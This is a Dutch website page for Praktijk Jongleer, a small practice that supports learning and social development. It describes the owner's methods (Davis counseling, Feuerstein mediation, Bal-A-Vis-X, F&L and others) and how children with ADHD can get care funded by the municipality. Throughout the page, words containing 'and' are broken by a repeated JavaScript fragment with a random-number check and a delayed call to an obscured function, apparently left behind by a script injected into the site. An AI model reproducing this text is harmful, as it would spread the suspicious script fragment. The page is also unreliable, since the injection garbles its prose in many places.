Praktijk Jongleer

Ook leuker leren leren?

Als leren leuker wordt, wordt het vaak ook makkelijker.
Samen zoeken we daarom de leerweg die bij je past.

En sociaal sterker willen staan?
Als leven lastig is, omdat je jezelf of de wereld om je heen niet begrijpt- dan ga je je vaak “lastig” gedragen.
Samen zoeken we uit hoe jij meer grip kunt krijgen.
Daarna wordt leren ook vaak weer makkelijker.

Kom in je kracht !!

Elsbeth

Ik werk alleen in een kleine leerpraktijk. Daarnaast verwijs ik geregeld door naar collega’s met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere / aanvullende specialisaties. 

Het is mijn passie om mensen te helpen in hun kracht te komen.
Daarvoor sluit ik eerst aan bij jou, daarna kijken we wat je nodig hebt om je leren of gedrag te verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. Hoe krijg je grip op jezelf?
Hierbij is leidend wat je eigen wensen zijn. Pas daarna kijken we of het wenselijk is aansluiting bij schoolstof te gaan zoeken.

Waarom is leren vaak niet (meer) leuk?
Soms is het belangrijk de oorzaak samen uit te zoeken, maar het liefste kijken we gewoon vooruit en mag je mijn puzzel- en leerhonger gebruiken om grip op jouw proces te leren krijgen.

Naast leren en lezen en spelletjes spelen is zijn mijn gezin en vrienden erg belangrijk voor mij. Vaak wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel ik met mijn hond. Zo maak ik mijn hoofd weer leeg:) of klets ik lekker bij met iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Als hobbies heb ik ook masseren en muziek luisteren.


RIVM regelingen

Momenteel werk ik online of in mijn eigen praktijk op een manier, die voldoet aan de RIVM en vakvereniging regelingen.


Ik ben opgeleid in de volgende methodes en gebruik een mix van dezen in mijn werk.

Davis Counseling

De opleidingen voor de modules dyslexie, dyscalculie, ADD, ADHD en autisme heb ik met goed gevolg gedaan en veel van deze methode gebruik ik in mijn werk.  Ook kan ik een “pure” Davis counseling geven. Hier volg ik ook nog geregeld bijscholingen voor.
Voor mensen, die denken vanuit het voelen en vanuit beelden is dit een prachtige manier van werken.
Er is veel aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor het leren grip te krijgen op je eigen denken / rust in je hoofd / concentratie.
Verder is er een levensconcepten programma wat iedereen mentale instrumenten geeft om de wereld makkelijker te begrijpen- of je nu autistisch bent, ADD of ADHD hebt , gewoon puber bent of gewoon neurotypisch denkt. Ik leer er nog elke keer stapjes van bij.

Feuerstein Mediatie

Werken vanuit positiviteit en ik gebruik veel spel om je bewust te maken van de cognitieve vaardigheden ( denkknoppen) en deze te versterken. Dit is vooral geschikt voor verbale en logisch analytisch denkende leerders.

Schrijfdansen

Schrijfdans is een leuke, goede vrolijke en creatieve manier om met behulp van muziek de motoriek te verbeteren.

Bal-á-Vis-X

Het Amerikaanse Bal-A-Vis-X® is een methode met ritmische oefeningen en speciale zandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andzakjes en balletjes, terwijl je op een balanceerbord staat. Concentratie, samenwerking hersenhelften…en meer

F&L taal in blokjes, Brightstart en CSL

De F&L methode wordt gebruikt om beter te leren lezen en spellen. Met verschillende kleuren blokjes wordt de structuur van een woord zichtbaar gemaakt. Op deze manier kun je klanken herkennen.

Brighstart is een programma om in groepsverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and basis sociale vaardigheden aan te leren aan mensen met een hele zware beperking. Hier werk ik niet meer mee, de kennis heb ik nog wel in huis en intergreer ik. 

CSL oftewel contact gericht spelen: dit programma is vooral gericht op  jongeren met ernstige leerproblemen (ZMLK) en zwaardere autisten. Het doel is voornamelijk het aanleren van dagelijkse vaardigheden.

Ik ben bevoegd een auditieve screening af te nemen om te kijken of jij letters wel goed verwerkt in je hersenen.  Zie: http://www.johansensoundtherapy.nl/. Soms doe ik dit voor we een dyslexie counseling starten.


Ervaring: oud zijn heeft zijn voordelen?

Hoe meer ervaring ik krijg, hoe beter het lukt goed met jou af te stemmen op wat jij nodig hebt. Soms is dat een bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and programma en vaak is dat een mix uit bovenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande methodes afgestemd op jou.
Schoolinhoud vind ik niet interessant- we gebruiken soms leerstof om te kijken hoe je het geleerde kunt toepassen. Voor bijles moet je iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders nemen.
Ik wil jou leren in je kracht te komen staan- in je denken en in je doen .


Kinderen met AD(H)D problematiek komen in aanmerking voor begeleiding via ambulante jeugdzorg. Deze kan worden vergoed door de gemeente. 

Hiervoor heeft u een verwijzing van uw huisarts nodig. 


Referenties & ervaringen bij Praktijk Jongleer


Alvast een kijkje
Bij mij in de praktijk

Ben je nieuwsgierig waar we samen aan de slag gaan? Wil je zien wat we bijvoorbeeld kunnen gaan doen om je te helpen met je uitdagingen? Hieronder een kleine impressie van de praktijk.

Praktijk Jongleer is aangesloten by

Beroepsmatige dienstverlening aangeduid als Davis®, Davis Dyslexia Correction®, Davis Symbol Mastery®, en Davis Orientation Counseling® mag uitsluitend verleend worden door mensen die opgeleid en gecertificeerd zijn door de Davis Dyslexia Association International.